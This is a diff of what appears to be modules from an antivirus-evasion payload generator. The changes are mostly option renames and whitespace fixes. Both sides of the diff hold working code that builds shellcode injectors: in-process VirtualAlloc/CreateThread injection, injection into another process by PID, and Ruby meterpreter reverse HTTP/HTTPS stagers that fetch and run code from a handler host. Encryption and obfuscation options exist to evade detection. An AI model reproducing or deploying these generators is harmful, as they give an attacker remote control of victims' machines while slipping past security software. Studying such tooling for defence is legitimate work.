-		main += "\n\t\t%s.setDaemon(True)" % thread_var
-		main += "\n\t\t%s.start()" % thread_var
-		main += "\n\t%s(%s)" % (getexec_func, url_var)
-		if self.required_options["Beacon"][0].lower() == 'y':
-			main += "\n\twhile True:"
-			main += "\n\t\ttime.sleep(0.1)"
-		main += "\nif __name__ == '__main__':"
-		main += "\n\t%s()" % main_func
+        url_var = helpers.randomString()
 
-		PayloadCode = imports + global_vars + inject + getexec + beaconthr + main
+        beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
+        beaconthr += "\n\twhile True:"
+        beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
+        beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
+        beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
+        beaconthr += "\n\t\t%s.start()\n" % thread_var
 
-		if self.required_options["use_pyherion"][0].lower() == "y":
-			PayloadCode = encryption.pyherion(PayloadCode)
+        main = "def %s():" % main_func
+        main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0])
+        main += "\n\tif %s is True:" % retry_var
+        main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
+        main += "\n\t\t%s.setDaemon(True)" % thread_var
+        main += "\n\t\t%s.start()" % thread_var
+        main += "\n\t%s(%s)" % (getexec_func, url_var)
+        if self.required_options["BEACON"][0].lower() == 'y':
+            main += "\n\twhile True:"
+            main += "\n\t\ttime.sleep(0.1)"
+        main += "\nif __name__ == '__main__':"
+        main += "\n\t%s()" % main_func
 
-		return PayloadCode
+        PayloadCode = imports + global_vars + inject + getexec + beaconthr + main
+
+        if self.required_options["USE_PYHERION"][0].lower() == "y":
+            PayloadCode = encryption.pyherion(PayloadCode)
+
+        return PayloadCode

--- a/modules/payloads/python/shellcode_inject/flat.py
+++ b/modules/payloads/python/shellcode_inject/flat.py
@@ -2,12 +2,12 @@
 
 Inline shellcode injection.
 
-Uses VirtualAlloc() to allocate space for shellcode, RtlMoveMemory() to 
+Uses VirtualAlloc() to allocate space for shellcode, RtlMoveMemory() to
 copy the shellcode in, then calls CreateThread() to invoke.
 
 Inspiration from http://www.debasish.in/2012/04/execute-shellcode-using-python.html
 
- - or - 
+ - or -
 
 Very basic void pointer reference, similar to the c payload
 
@@ -36,15 +36,17 @@ class Payload:
 
         self.shellcode = shellcode.Shellcode()
 
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["Virtual", "Virtual, Void, or Heap"],
-                                 "expire_payload" : ["X", "Optional: Payloads expire after \"X\" days"]}
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["Virtual", "Virtual, Void, or Heap"],
+                                    "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
+                                }
 
     def generate(self):
-        if self.required_options["inject_method"][0].lower() == "virtual":
-            if self.required_options["expire_payload"][0].lower() == "x":
+        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -64,7 +66,7 @@ class Payload:
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -72,7 +74,7 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -99,13 +101,13 @@ class Payload:
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
-        if self.required_options["inject_method"][0].lower() == "heap":
-            if self.required_options["expire_payload"][0].lower() == "x":
+        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -127,7 +129,7 @@ class Payload:
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -136,7 +138,7 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -165,13 +167,13 @@ class Payload:
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
         else:
-            if self.required_options["expire_payload"][0].lower() == "x":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -187,7 +189,7 @@ class Payload:
                 PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += RandShellcode + '()'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -195,7 +197,7 @@ class Payload:
             else:
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -218,7 +220,7 @@ class Payload:
                 PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += '\t' + RandShellcode + '()'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode

--- a/modules/payloads/python/shellcode_inject/letter_substitution.py
+++ b/modules/payloads/python/shellcode_inject/letter_substitution.py
@@ -24,22 +24,24 @@ from modules.common import encryption
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "A letter used in shellcode is replaced with a different letter. At runtime, the exe reverses the letter substitution and executes the shellcode"
         self.language = "python"
         self.rating = "Excellent"
         self.extension = "py"
-        
+
         self.shellcode = shellcode.Shellcode()
 
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["Virtual", "Virtual, Heap, or Void"],
-                                 "expire_payload" : ["X", "Optional: Payloads expire after \"X\" days"]}
-    
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["Virtual", "Virtual, Heap, or Void"],
+                                    "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
+                                }
+
     def generate(self):
         #Random letter substition variables
         hex_letters = "abcdef"
@@ -66,8 +68,8 @@ class Payload:
         # Escaping Shellcode
         Shellcode = Shellcode.encode("string_escape")
 
-        if self.required_options["inject_method"][0].lower() == "virtual":
-            if self.required_options["expire_payload"][0].lower() == "x":
+        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Create Payload File
                 payload_code = 'import ctypes as avlol\n'
@@ -84,16 +86,16 @@ class Payload:
                 payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     payload_code = encryption.pyherion(payload_code)
-            
+
                 return payload_code
 
             else:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Extra Variables
                 RandToday = helpers.randomString()
@@ -119,13 +121,13 @@ class Payload:
                 payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     payload_code = encryption.pyherion(payload_code)
-            
+
                 return payload_code
 
-        if self.required_options["inject_method"][0].lower() == "heap":
-            if self.required_options["expire_payload"][0].lower() == "x":
+        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 HeapVar = helpers.randomString()
 
@@ -146,16 +148,16 @@ class Payload:
                 payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     payload_code = encryption.pyherion(payload_code)
-            
+
                 return payload_code
 
             else:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Extra Variables
                 RandToday = helpers.randomString()
@@ -184,13 +186,13 @@ class Payload:
                 payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     payload_code = encryption.pyherion(payload_code)
-            
+
                 return payload_code
 
         else:
-            if self.required_options["expire_payload"][0].lower() == "x":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 #Additional random variable names
                 rand_reverse_shell = helpers.randomString()
@@ -209,8 +211,8 @@ class Payload:
                 payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
                 payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
                 payload_code += rand_shellcode + '()'
-    
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     payload_code = encryption.pyherion(payload_code)
 
                 return payload_code
@@ -219,7 +221,7 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Extra Variables
                 RandToday = helpers.randomString()
@@ -249,7 +251,7 @@ class Payload:
                 payload_code += '\t' + rand_shellcode + '()'
 
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     payload_code = encryption.pyherion(payload_code)
 
                 return payload_code

--- a/modules/payloads/python/shellcode_inject/pidinject.py
+++ b/modules/payloads/python/shellcode_inject/pidinject.py
@@ -20,7 +20,7 @@ from modules.common import encryption
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "Payload which injects and executes shellcode into the memory of a process you specify."
@@ -29,15 +29,17 @@ class Payload:
         self.extension = "py"
 
         self.shellcode = shellcode.Shellcode()
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "pid_number" : ["1234", "PID # to inject"],
-                                 "expire_payload" : ["X", "Optional: Payloads expire after \"X\" days"]}
-        
+
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "PID_NUMBER"     : ["1234", "PID # to inject"],
+                                    "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
+                                 }
+
     def generate(self):
-            if self.required_options["expire_payload"][0].lower() == "x":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -60,14 +62,14 @@ class Payload:
                 PayloadCode += memcommit_variable + ' = 0x00001000\n'
                 PayloadCode += kernel32_variable + ' = windll.kernel32\n'
                 PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
-                PayloadCode += pid_num_variable + ' = ' + self.required_options["pid_number"][0] +'\n'
+                PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
                 PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
                 PayloadCode += prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
                 PayloadCode += memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
                 PayloadCode += kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
                 PayloadCode += kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -76,7 +78,7 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
@@ -105,7 +107,7 @@ class Payload:
                 PayloadCode += memcommit_variable + ' = 0x00001000\n'
                 PayloadCode += kernel32_variable + ' = windll.kernel32\n'
                 PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n'
-                PayloadCode += pid_num_variable + ' = ' + self.required_options["pid_number"][0] +'\n'
+                PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n'
                 PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n'
                 PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                 PayloadCode += '\t' + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
@@ -113,7 +115,7 @@ class Payload:
                 PayloadCode += '\t' + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
                 PayloadCode += '\t' + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
 
-                if self.required_options["use_pyherion"][0].lower() == "y":
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode

--- a/modules/payloads/ruby/meterpreter/rev_http.py
+++ b/modules/payloads/ruby/meterpreter/rev_http.py
@@ -12,26 +12,28 @@ from modules.common import helpers
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
         self.language = "ruby"
         self.extension = "rb"
         self.rating = "Normal"
-        
-        # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {   "compile_to_exe" : ["Y", "Compile to an executable"],
-                                    "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["", "Port of the metasploit handler"]}
+
+        # options we require user ineraction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["80", "Port of the Metasploit handler"]
+                                }
 
     def generate(self):
 
         payloadCode = "require 'rubygems';require 'win32/api';require 'net/http';include Win32\n"
         payloadCode += "exit if Object.const_defined?(:Ocra)\n"
-        
+
         payloadCode += "$v = API.new('VirtualAlloc', 'IIII', 'I');$r = API.new('RtlMoveMemory', 'IPI', 'V');$c = API.new('CreateThread', 'IIIIIP', 'I');$w = API.new('WaitForSingleObject', 'II', 'I')\n"
-        
+
         payloadCode += "def ch()\n"
         #payloadCode += "\tchk = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n"
         #payloadCode += "\t32.times do\n"
@@ -42,14 +44,14 @@ class Payload:
         #payloadCode += "\tend\n"
         payloadCode += "\treturn \"WEZf\"\n"
         payloadCode += "end\n"
-        
+
         payloadCode += "def ij(sc)\n"
         payloadCode += "\tif sc.length > 1000\n"
         payloadCode += "\t\tpt = $v.call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
         payloadCode += "\t\tx = $r.call(pt,sc,sc.length)\n"
         payloadCode += "\t\tx = $w.call($c.call(0,0,pt,0,0,0),0xFFFFFFF)\n"
         payloadCode += "\tend\nend\n"
-        
+
         payloadCode += "uri = URI.encode(\"http://%s:%s/#{ch()}\")\n" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
         payloadCode += "uri = URI(uri)\n"
         payloadCode += "ij(Net::HTTP.get(uri))"

--- a/modules/payloads/ruby/meterpreter/rev_http_contained.py
+++ b/modules/payloads/ruby/meterpreter/rev_http_contained.py
@@ -1,8 +1,8 @@
 """
 
-Reads in metsrv.dll, patches it with appropriate options for a 
-meterpreter reverse_https payload compresses/bas64 encodes it 
-and then builds a ruby injection wrapper to inject the contained 
+Reads in metsrv.dll, patches it with appropriate options for a
+meterpreter reverse_https payload compresses/bas64 encodes it
+and then builds a ruby injection wrapper to inject the contained
 meterpreter dll into memory.
 
 A lot of code taken from the python contained modules and modified for ruby
@@ -22,21 +22,23 @@ import settings
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "Self contained meterpreter http ruby payload"
         self.language = "ruby"
         self.extension = "rb"
         self.rating = "Normal"
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {   "compile_to_exe" : ["Y", "Compile to an executable"],
-                                    "use_crypter"     : ["N", "Use the Ruby encrypter"],
-                                    "inject_method" : ["virtual", "[virtual]alloc"],
-                                    "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["80", "Port of the metasploit handler"]}
-        
+
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_CRYPTER"    : ["N", "Use the Ruby encrypter"],
+                                    "INJECT_METHOD"  : ["virtual", "[virtual]alloc"],
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["80", "Port of the Metasploit handler"]
+                                }
+
 
     def generate(self):
 
@@ -49,16 +51,16 @@ class Payload:
         # replace the URL
         urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
         meterpreterDll = patch.patchURL(meterpreterDll, urlString)
-        
+
         # replace in the UA
         meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
 
         # compress/base64 encode the dll
         compressedDll = helpers.deflate(meterpreterDll)
-        
+
         # actually build out the payload
         payloadCode = ""
-        
+
         payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
         payloadCode += "exit if Object.const_defined?(:Ocra)\n"
 
@@ -88,7 +90,7 @@ class Payload:
         payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
         payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)
 
-        if self.required_options["use_crypter"][0].lower() == "y":
+        if self.required_options["USE_CRYPTER"][0].lower() == "y":
             payloadCode = encryption.rubyCrypter(payloadCode)
 
         return payloadCode

--- a/modules/payloads/ruby/meterpreter/rev_https.py
+++ b/modules/payloads/ruby/meterpreter/rev_https.py
@@ -12,26 +12,28 @@ from modules.common import helpers
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
         self.language = "ruby"
         self.extension = "rb"
         self.rating = "Normal"
-        
-        # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {   "compile_to_exe" : ["Y", "Compile to an executable"],
-                                    "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["", "Port of the metasploit handler"]}
+
+        # options we require user ineraction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["", "Port of the Metasploit handler"]
+                                }
 
     def generate(self):
 
         payloadCode = "require 'rubygems';require 'uri';require 'win32/api';require 'net/https';require 'openssl';include Win32\n"
         payloadCode += "exit if Object.const_defined?(:Ocra)\n"
-        
+
         payloadCode += "$v = API.new('VirtualAlloc', 'IIII', 'I');$r = API.new('RtlMoveMemory', 'IPI', 'V');$c = API.new('CreateThread', 'IIIIIP', 'I');$w = API.new('WaitForSingleObject', 'II', 'I')\n"
-        
+
         payloadCode += "def ch()\n"
         #payloadCode += "\tchk = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n"
         #payloadCode += "\t32.times do\n"
@@ -42,7 +44,7 @@ class Payload:
         #payloadCode += "\tend\n"
         payloadCode += "\treturn \"WEZf\"\n"
         payloadCode += "end\n"
-        
+
         payloadCode += "def ij(sc)\n"
         payloadCode += "\tif sc.length > 1000\n"
         payloadCode += "\t\tpt = $v.call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"

--- a/modules/payloads/ruby/meterpreter/rev_https_contained.py
+++ b/modules/payloads/ruby/meterpreter/rev_https_contained.py
@@ -1,8 +1,8 @@
 """
 
-Reads in metsrv.dll, patches it with appropriate options for a 
-meterpreter reverse_https payload compresses/base64 encodes it 
-and then builds a ruby injection wrapper to inject the contained 
+Reads in metsrv.dll, patches it with appropriate options for a
+meterpreter reverse_https payload compresses/base64 encodes it
+and then builds a ruby injection wrapper to inject the contained
 meterpreter dll into memory.
 
 A lot of code taken from the python contained modules and modified for ruby
@@ -22,22 +22,24 @@ import settings
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "Self contained meterpreter https ruby payload"
         self.language = "ruby"
         self.extension = "rb"
         self.rating = "Normal"
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {   "compile_to_exe" : ["Y", "Compile to an executable"],
-                                    "use_crypter"     : ["N", "Use the Ruby encrypter"],
-                                    "inject_method" : ["virtual", "[virtual]alloc"],
-                                    "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["443", "Port of the metasploit handler"]}
 
-                    
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_CRYPTER"    : ["N", "Use the Ruby encrypter"],
+                                    "INJECT_METHOD"  : ["virtual", "[virtual]alloc"],
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["443", "Port of the Metasploit handler"]
+                                }
+
+
     def generate(self):
 
         # get the main meterpreter .dll with the header/loader patched
@@ -49,16 +51,16 @@ class Payload:
         # replace the URL
         urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
         meterpreterDll = patch.patchURL(meterpreterDll, urlString)
-        
+
         # replace in the UA
         meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
 
         # compress/base64 encode the dll
         compressedDll = helpers.deflate(meterpreterDll)
-        
+
         # actually build out the payload
         payloadCode = ""
-        
+
         payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
         payloadCode += "exit if Object.const_defined?(:Ocra)\n"
 
@@ -88,7 +90,7 @@ class Payload:
         payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
         payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)
 
-        if self.required_options["use_crypter"][0].lower() == "y":
+        if self.required_options["USE_CRYPTER"][0].lower() == "y":
             payloadCode = encryption.rubyCrypter(payloadCode)
 
         return payloadCode

--- a/modules/payloads/ruby/meterpreter/rev_tcp.py
+++ b/modules/payloads/ruby/meterpreter/rev_tcp.py
@@ -13,27 +13,29 @@ from modules.common import helpers
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode"
         self.language = "ruby"
         self.extension = "rb"
         self.rating = "Normal"
-        
-        # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {   "compile_to_exe" : ["Y", "Compile to an executable"],
-                                    "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["", "Port of the metasploit handler"]}
+
